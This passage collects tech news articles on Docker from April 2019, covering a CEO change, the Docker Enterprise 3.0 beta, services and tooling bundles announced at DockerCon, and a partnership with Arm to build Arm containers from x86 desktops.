As for Bearden, he is an experienced executive with a history of successful exits. In addition to his experience at Hortonworks, he was COO at SpringSource, a developer tool suite that was sold to VMware for $420 million in 2009 (and is now part of Pivotal). He was also COO at JBoss, an open-source middleware company acquired by Red Hat in 2006.

Whether he will do the same with Docker remains to be seen, but as the new CEO, it will be up to him to guide the company moving forward to the next steps in its evolution, whether that eventually results in a sale or the IPO that Singh alluded to.

Email to staff from Steve Singh:

Note: Docker has now confirmed this story in a press release.

Apr
30
2019
--

Docker looks to partners and packages to ease container implementation

Docker appears to be searching for ways to simplify the core value proposition of the company — creating, deploying and managing containers. While most would agree it has revolutionized software development, like many technology solutions, it takes a certain level of expertise and staffing to pull off. At DockerCon, the company’s customer conference taking place this week in San Francisco, Docker announced several ways it could help customers with the tough parts of implementing a containerized solution.

For starters, the company announced a beta of Docker Enterprise 3.0 this morning. That update is all about making life simpler for developers. As companies move to containerized environments, it’s a challenge for all but the largest organizations like Google, Amazon and Facebook, all of whom have massive resource requirements and correspondingly large engineering teams.

Most companies don’t have that luxury though, and Docker recognizes if it wants to bring containerization to a larger number of customers, it has to create packages and programs that make it easier to implement.

Docker Enterprise 3.0 is a step toward providing a solution that lets developers concentrate on the development aspects, while working with templates and other tools to simplify the deployment and management side of things.

The company sees customers struggling with implementation and how to configure and build a containerized workflow, so it is working with systems integrators to help smooth out the difficult parts. Today, the company announced Docker Enterprise as a Service, with the goal of helping companies through the process of setting up and managing a containerized environment, using the Docker stack and adjacent tooling like Kubernetes.

The service provider will take care of operational details like managing upgrades, rolling out patches, doing backups and undertaking capacity planning — all of those operational tasks that require a high level of knowledge around enterprise container stacks.

Capgemini will be the first go-to-market partner. “Capgemini has a combination of automation, technology tools, as well as services on the back end that can manage the installation, provisioning and management of the enterprise platform itself in cases where customers don’t want to do that, and they want to pay someone to do that for them,” Scott Johnston, chief product officer at Docker told TechCrunch.

The company has released tools in the past to help customers move legacy applications into containers without a lot of fuss. Today, the company announced a solution bundle called Accelerate Greenfield, a set of tools designed to help customers get up and running as container-first development companies.

“This is for those organizations that may be a little further along. They’ve gone all-in on containers committing to taking a container-first approach to new application development,” Johnston explained. He says this could be cloud native microservices or even a LAMP stack application, but the point is that they want to put everything in containers on a container platform.

Accelerate Greenfield is designed to do that. “They get the benefits where they know that from the developer to the production end point, it’s secure. They have a single way to define it all the way through the life cycle. They can make sure that it’s moving quickly, and they have that portability built into the container format, so they can deploy [wherever they wish],” he said.

These programs and products are all about providing a level of hand-holding, either by playing a direct consultative role, working with a systems integrator or providing a set of tools and technologies to walk the customer through the containerization life cycle. Whether they provide a sufficient level of help that customers require is something we will learn over time as these programs mature.

Apr
30
2019
--

Docker updates focus on simplifying containerization for developers

Over the last five years, Docker has become synonymous with software containers, but that doesn’t mean every developer understands the technical details of building, managing and deploying them. At DockerCon this week, the company’s customer conference taking place in San Francisco, it announced new tools that have been designed to make it easier for developers, who might not be Docker experts, to work with containers.

As the technology has matured, the company has seen the market broaden, but in order to take advantage of that, it needs to provide a set of tools that make it easier to work with. “We’ve found that customers typically have a small cadre of Docker experts, but there are hundreds, if not thousands, of developers who also want to use Docker. And we reasoned, how can we help them get productive very, very quickly, without them having to become Docker experts,” Scott Johnston, chief product officer at Docker, told TechCrunch.

To that end, it announced a beta of Docker Enterprise 3.0, which includes several key components. For starters, Docker Desktop Enterprise lets IT set up a Docker environment with the kind of security and deployment templates that make sense for each customer. The developers can then pick the templates that make sense for their implementations, while conforming with compliance and governance rules in the company.

“These templates already have IT-approved container images, and have IT-approved configuration settings. And what that means is that IT can provide these templates through these visual tools that allow developers to move fast and choose the ones they want without having to go back for approval,” Johnston explained.

The idea is to let the developers concentrate on building applications, and the templates provide all the Docker tooling pre-built and ready to go, so they don’t have to worry about all of that.

Another piece of this is Docker Applications, which allows developers to build complex containerized applications as a single package and deploy them to any infrastructure they wish — on-prem or in the cloud. Five years ago, when Docker really got started with containers, they were a simpler idea, often involving just a single one, but as developers broke down those larger applications into microservices, it created a new level of difficulty, especially for operations that had to deploy these increasingly large sets of application containers.

“Operations can now programmatically change the parameters for the containers, depending on the environments, without having to go in and change the application. So you can imagine that ability lowers the friction of having to manage all these files in the first place,” he said.

The final piece of that is the orchestration layer, and the popular way to handle that today is with Kubernetes. Docker has created its own flavor of Kubernetes, based on the open-source tool. Johnston says, as with the other two pieces, the goal here is to take a powerful tool like Kubernetes and reduce the overall complexity associated with running it, while making it fully compatible with a Docker environment.

For that, Docker announced Docker Kubernetes Service (DKS), which has been designed with Docker users in mind, including support for Docker Compose, a scripting tool that has been popular with Docker users. While you are free to use any flavor of Kubernetes you wish, Docker is offering DKS as a Docker-friendly version for developers.

All of these components have one thing in common besides being part of Docker Enterprise 3.0. They are trying to reduce the complexity associated with deploying and managing containers and to abstract away the most difficult parts, so that developers can concentrate on developing without having to worry about connecting to the technical underpinnings of building and deploying containers. At the same time, Docker is trying to make it easier for the operations team to manage it all. That is the goal, at least. In the end, DevOps teams will be the final judges of how well Docker has done, once these tools become generally available later this year.

The Docker Enterprise 3.0 beta will be available later this quarter.

Apr
24
2019
--

Docker developers can now build Arm containers on their desktops

Docker and Arm today announced a major new partnership that will see the two companies collaborate in bringing improved support for the Arm platform to Docker’s tools.

The main idea here is to make it easy for Docker developers to build their applications for the Arm platform right from their x86 desktops and then deploy them to the cloud (including the Arm-based AWS EC2 A1 instances), edge and IoT devices. Developers will be able to build their containers for Arm just like they do today, without the need for any cross-compilation.

This new capability, which will work for applications written in JavaScript/Node.js, Python, Java, C++, Ruby, .NET core, Go, Rust and PHP, will become available as a tech preview next week, when Docker hosts its annual North American developer conference in San Francisco.

Typically, developers would have to build the containers they want to run on the Arm platform on an Arm-based server. With this system, which is the first result of this new partnership, Docker essentially emulates an Arm chip on the PC for building these images.
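
While the article predates the feature’s general availability, the capability it describes later surfaced through Docker’s buildx plugin; a rough sketch of such a multi-architecture build, assuming buildx and its QEMU-based emulation are installed (the image name is a placeholder):

# Build the same Dockerfile for Arm and x86 from an x86 desktop, then push both
docker buildx build --platform linux/arm64,linux/amd64 -t myrepo/myapp:latest --push .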

“Overnight, the 2 million Docker developers that are out there can use the Docker commands they already know and become Arm developers,” Docker EVP of Strategic Alliances David Messina told me. “Docker, just like we’ve done many times over, has simplified and streamlined processes and made them simpler and accessible to developers. And in this case, we’re making x86 developers on their laptops Arm developers overnight.”

Given that cloud-based Arm servers like Amazon’s A1 instances are often significantly cheaper than x86 machines, users can achieve some immediate cost benefits by using this new system and running their containers on Arm.

For Docker, this partnership opens up new opportunities, especially in areas where Arm chips are already strong, including edge and IoT scenarios. Arm, similarly, is interested in strengthening its developer ecosystem by making it easier to develop for its platform. The easier it is to build apps for the platform, the more likely developers are to then run them on servers that feature chips from Arm’s partners.

“Arm’s perspective on the infrastructure really spans all the way from the endpoint, all the way through the edge to the cloud data center, because we are one of the few companies that have a presence all the way through that entire path,” Mohamed Awad, Arm’s VP of Marketing, Infrastructure Line of Business, said. “It’s that perspective that drove us to make sure that we engage Docker in a meaningful way and have a meaningful relationship with them. We are seeing compute and the infrastructure sort of transforming itself right now from the old model of centralized compute, general purpose architecture, to a more distributed and more heterogeneous compute system.”

Developers, however, Awad rightly noted, don’t want to have to deal with this complexity, yet they also increasingly need to ensure that their applications run on a wide variety of platforms and that they can move them around as needed. “For us, this is about enabling developers and freeing them from lock-in on any particular area and allowing them to choose the right compute for the right job that is the most efficient for them,” Awad said.

Messina noted that the promise of Docker has long been to remove the dependence of applications from the infrastructure on which they run. Adding Arm support simply extends this promise to an additional platform. He also stressed that the work on this was driven by the company’s enterprise customers. These are the users who have already set up their systems for cloud-native development with Docker’s tools — at least for their x86 development. Those customers are now looking at developing for their edge devices, too, and that often means developing for Arm-based devices.

Awad and Messina both stressed that developers really don’t have to learn anything new to make this work. All of the usual Docker commands will just work.
